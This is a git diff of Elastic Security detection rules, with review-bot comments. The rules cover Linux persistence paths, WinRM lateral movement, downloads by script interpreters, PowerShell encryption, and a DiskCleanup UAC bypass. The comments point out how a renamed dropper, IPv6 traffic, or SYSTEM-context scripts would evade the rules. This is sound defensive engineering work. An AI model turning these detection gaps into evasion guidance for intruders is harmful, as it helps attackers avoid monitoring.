it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve 
Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator that performed these actions for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Cron Job Created or Changed by Previously Unknown Process - ff10d4d8-fea7-422d-afb1-e5a2702369a9\n- Potential Persistence Through Run Control Detected - 0f4d35e4-925e-4959-ab24-911be207ee6f\n- Potential Persistence Through init.d Detected - 474fd20e-14cc-49c5-8160-d9ab4ba16c8b\n- New Systemd Timer Created - 7fb500fa-8e24-4bd1-9480-2a819352602c\n- New Systemd Service Created by Previously Unknown Process - 17b0a495-4d9f-414c-8ad0-92f018b8e001\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse 
proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"linux\" and event.type in (\"creation\", \"file_create_event\") and user.id == \"0\" and\nfile.path : (\"/etc/ld.so.conf.d/*\", \"/etc/cron.d/*\", \"/etc/sudoers.d/*\", \"/etc/rc.d/init.d/*\", \"/etc/systemd/system/*\",\n\"/usr/lib/systemd/system/*\") and not (\n (process.name : (\n \"chef-client\", \"ruby\", \"pacman\", \"packagekitd\", \"python*\", \"platform-python\", \"dpkg\", \"yum\", \"apt\", \"dnf\", \"rpm\",\n \"systemd\", \"snapd\", \"dnf-automatic\", \"yum-cron\", \"elastic-agent\", \"dnfdaemon-system\", \"dockerd\", \"executor\",\n \"rhn_check\"\n )\n ) or \n (file.extension in (\"swp\", \"swpx\", \"tmp\"))\n)\n", + "references": [ + "https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/", + "https://www.intezer.com/blog/research/lightning-framework-new-linux-threat/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + 
"name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1c84dd64-7e6c-4bad-ac73-a5014ee37042", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Threat: Orbit", + "Threat: Lightning Framework", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1037", + "name": "Boot or Logon Initialization Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/", + "subtechnique": [ + { + "id": "T1037.004", + "name": "RC Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/004/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.006", + "name": "Dynamic Linker Hijacking", + "reference": "https://attack.mitre.org/techniques/T1574/006/" + } + ] + }, + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.002", + "name": "Systemd Service", + "reference": "https://attack.mitre.org/techniques/T1543/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": 
"https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.003", + "name": "Cron", + "reference": "https://attack.mitre.org/techniques/T1053/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.003", + "name": "Sudo and Sudo Caching", + "reference": "https://attack.mitre.org/techniques/T1548/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 113 + }, + "id": "1c84dd64-7e6c-4bad-ac73-a5014ee37042_113", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_107.json b/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_107.json new file mode 100644 index 00000000000..0de47dd8664 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_107.json 
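Review bot: The allowlist in the `not (process.name : (...))` clause of the query keys on a name the attacker chooses, so a dropper that names itself `python3`, `ruby` or `executor` and writes into `/etc/cron.d/` or `/etc/sudoers.d/` passes straight through the rule. Anchoring the legitimate package managers and agents on `process.executable` paths instead of (or in addition to) `process.name`, e.g. `process.executable : ("/usr/bin/dpkg", "/usr/bin/rpm", "/usr/bin/python3*", ...)`, keeps the same false-positive reduction without the rename bypass. Separately, the investigation guide's osquery queries list `/etc/init.d/%` and `/etc/rc%.d/%`, but `file.path` in the query only covers `/etc/rc.d/init.d/*`; either add `"/etc/init.d/*"` to the query or trim the guide so analysts are not led to expect coverage the rule does not have. The `"python*"` wildcard is also worth a one-line comment in the note explaining why it is accepted, since it is the broadest of the exclusions.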
@@ -0,0 +1,122 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Identifies remote execution via Windows Remote Management (WinRM) remote shell on a target host. This could be an indication of lateral movement.",
+ "false_positives": [
+ "WinRM is a dual-use protocol that can be used for benign or malicious activity. It's important to baseline your environment to determine the amount of noise to expect from this tool."
+ ],
+ "from": "now-9m",
+ "index": [
+ "winlogbeat-*",
+ "logs-endpoint.events.*",
+ "logs-windows.sysmon_operational-*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Incoming Execution via WinRM Remote Shell",
+ "query": "sequence by host.id with maxspan=30s\n [network where host.os.type == \"windows\" and process.pid == 4 and network.direction : (\"incoming\", \"ingress\") and\n destination.port in (5985, 5986) and network.protocol == \"http\" and source.ip != \"127.0.0.1\" and source.ip != \"::1\"]\n [process where host.os.type == \"windows\" and \n event.type == \"start\" and process.parent.name : \"winrshost.exe\" and not process.executable : \"?:\\\\Windows\\\\System32\\\\conhost.exe\"]\n",
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ },
+ {
+ "package": "windows",
+ "version": "^1.5.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "destination.port",
+ "type": "long"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.id",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "network.direction",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "network.protocol",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.executable",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.pid",
+ "type": "long"
+ },
+ {
+ "ecs": true,
+ "name": "source.ip",
+ "type": "ip"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "1cd01db9-be24-4bef-8e7c-e923f0ff78ab",
+ "severity": "medium",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Lateral Movement",
+ "Data Source: Elastic Defend",
+ "Data Source: Sysmon"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0008",
+ "name": "Lateral Movement",
+ "reference": "https://attack.mitre.org/tactics/TA0008/"
+ },
+ "technique": [
+ {
+ "id": "T1021",
+ "name": "Remote Services",
+ "reference": "https://attack.mitre.org/techniques/T1021/",
+ "subtechnique": [
+ {
+ "id": "T1021.006",
+ "name": "Windows Remote Management",
+ "reference": "https://attack.mitre.org/techniques/T1021/006/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "type": "eql",
+ "version": 107
+ },
+ "id": "1cd01db9-be24-4bef-8e7c-e923f0ff78ab_107",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_109.json b/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_109.json
new file mode 100644
index 00000000000..be620eb964a
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_109.json
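Review bot: The first stage of the sequence requires `network.protocol == "http"` while also accepting `destination.port in (5985, 5986)`; 5986 is the WinRM HTTPS listener, and if the endpoint labels that traffic as anything other than `http` (presumably `tls` or `https` — confirm against Elastic Defend's network events), the 5986 branch can never match and the rule silently covers only plaintext WinRM. Either verify the label and widen it, e.g. `network.protocol in ("http", "https", "tls")`, or drop the protocol clause, since `process.pid == 4` plus the two ports already selects the HTTP.sys listener. The `false_positives` entry could also state that the two stages are correlated only by `host.id` within 30s, so a benign inbound WinRM session and an unrelated `winrshost.exe` child on the same host will pair up; that is inherent to the design and worth telling analysts.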
@@ -0,0 +1,137 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies built-in Windows script interpreters (cscript.exe or wscript.exe) being used to download an executable file from a remote destination.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote File Download via Script Interpreter", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via Script Interpreter\n\nThe Windows Script Host (WSH) is a Windows automation technology, which is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation.\n\nAttackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but can also use them to download tools and utilities needed to accomplish their goals.\n\nThis rule looks for DLLs and executables downloaded using `cscript.exe` or `wscript.exe`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze both the script and the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result 
!= 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- The usage of these script engines by regular users is unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by host.id, process.entity_id\n [network where host.os.type == \"windows\" and process.name : (\"wscript.exe\", \"cscript.exe\") and network.protocol != \"dns\" and\n network.direction : (\"outgoing\", \"egress\") and network.type == \"ipv4\" and destination.ip != \"127.0.0.1\"\n ]\n [file where host.os.type == \"windows\" and event.type == \"creation\" and file.extension : (\"exe\", \"dll\")]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1d276579-3380-4095-ad38-e596a01bc64f", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic 
Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.005", + "name": "Visual Basic", + "reference": "https://attack.mitre.org/techniques/T1059/005/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 109 + }, + "id": "1d276579-3380-4095-ad38-e596a01bc64f_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_6.json b/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_6.json new file mode 100644 index 00000000000..23414d730df --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_6.json 
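Review bot: `network.type == "ipv4"` in the first stage of the query means a payload fetched by `wscript.exe`/`cscript.exe` over IPv6 never satisfies the sequence, and the loopback exclusion only names `127.0.0.1`, so the rule is blind to dual-stack hosts for no stated reason. Replacing that clause with `destination.ip != "127.0.0.1" and destination.ip != "::1"` (and dropping `network.type == "ipv4"`) keeps the loopback exclusion while covering both families. The sequence also has no `with maxspan`, unlike the WinRM rule in this same change, so the network event and the `.exe`/`.dll` creation can be arbitrarily far apart within the process lifetime; a bound such as `sequence by host.id, process.entity_id with maxspan=5m` is worth considering, or a comment in the note explaining why it is left unbounded.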
@@ -0,0 +1,87 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of Cmdlets and methods related to encryption/decryption of files in PowerShell scripts, which malware and offensive security tools can abuse to encrypt data or decrypt payloads to bypass security solutions.", + "false_positives": [ + "Legitimate PowerShell Scripts which makes use of encryption." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Encryption/Decryption Capabilities", + "note": "## Triage and analysis\n\n### Investigating PowerShell Script with Encryption/Decryption Capabilities\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks, making it available for use in various environments, creating an attractive way for attackers to execute code.\n\nPowerShell offers encryption and decryption functionalities that attackers can abuse for various purposes, such as concealing payloads, C2 communications, and encrypting data as part of ransomware operations.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n\n### False positive analysis\n\n- This is a dual-use mechanism, meaning its usage is not inherently malicious. Analysts can dismiss the alert if the script doesn't contain malicious functions or potential for abuse, no other suspicious activity was identified, and there are justifications for the execution.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (\n \"Cryptography.AESManaged\" or\n \"Cryptography.RijndaelManaged\" or\n \"Cryptography.SHA1Managed\" or\n \"Cryptography.SHA256Managed\" or\n \"Cryptography.SHA384Managed\" or\n \"Cryptography.SHA512Managed\" or\n \"Cryptography.SymmetricAlgorithm\" or\n \"PasswordDeriveBytes\" or\n \"Rfc2898DeriveBytes\"\n ) and\n (\n CipherMode and PaddingMode\n ) and\n (\n \".CreateEncryptor\" or\n \".CreateDecryptor\"\n )\n ) and not user.id : \"S-1-5-18\"\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1d9aeb0b-9549-46f6-a32d-05e2a001b7fd", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/" + }, + { + "id": "T1140", + "name": 
"Deobfuscate/Decode Files or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 6 + }, + "id": "1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_108.json b/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_108.json new file mode 100644 index 00000000000..48ee73793f0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_108.json 
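Review bot: The rule has no `setup` section even though it depends entirely on `powershell.file.script_block_text` from `logs-windows.powershell*`, which is only populated when PowerShell Script Block Logging (event 4104) is enabled and shipped by the Windows integration; every other rule in this change that needs non-default telemetry carries a `setup` block, and without one this rule will quietly never fire in environments that have not turned the logging on. Add a short `setup` stating that Script Block Logging must be enabled and the PowerShell Operational log collected. The `not user.id : "S-1-5-18"` exclusion also removes every SYSTEM-context script from scope, which is exactly the context a scheduled task or service would run an encryption routine in after privilege escalation; if that trade-off is intentional it should be recorded in `false_positives` or the note so analysts know the gap exists.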
@@ -0,0 +1,143 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies User Account Control (UAC) bypass via hijacking DiskCleanup Scheduled Task. Attackers bypass UAC to stealthily execute code with elevated permissions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "UAC Bypass via DiskCleanup Scheduled Task Hijack", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.args : \"/autoclean\" and process.args : \"/d\" and process.executable != null and \n not process.executable : (\"C:\\\\Windows\\\\System32\\\\cleanmgr.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\cleanmgr.exe\",\n \"C:\\\\Windows\\\\System32\\\\taskhostw.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1dcc51f6-ba26-49e7-9ef4-2655abb2361e", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + 
"Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "1dcc51f6-ba26-49e7-9ef4-2655abb2361e_108", + "type": "security-rule" +} \ No newline at end of file 
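Review bot: The query depends on `process.args` carrying both `/autoclean` and `/d`, yet the `index` list includes `winlogbeat-*` and `logs-system.security*` while the `setup` section only discusses `event.ingested`. Windows Security process-creation events (4688) only carry the command line when the "Include command line in process creation events" audit policy is enabled, so without that note those sources silently contribute nothing and the rule effectively relies on Elastic Defend, Endgame and Sysmon data alone. Suggest adding a line to `setup` such as `For Windows Security event sources, enable the "Include command line in process creation events" audit policy so that process.args is populated.` The `_109` file that follows differs only in the narrowed `logs-endpoint.events.process-*` pattern and needs the same addition.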
diff --git a/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_109.json b/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_109.json new file mode 100644 index 00000000000..3cdbbc359fd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_109.json 
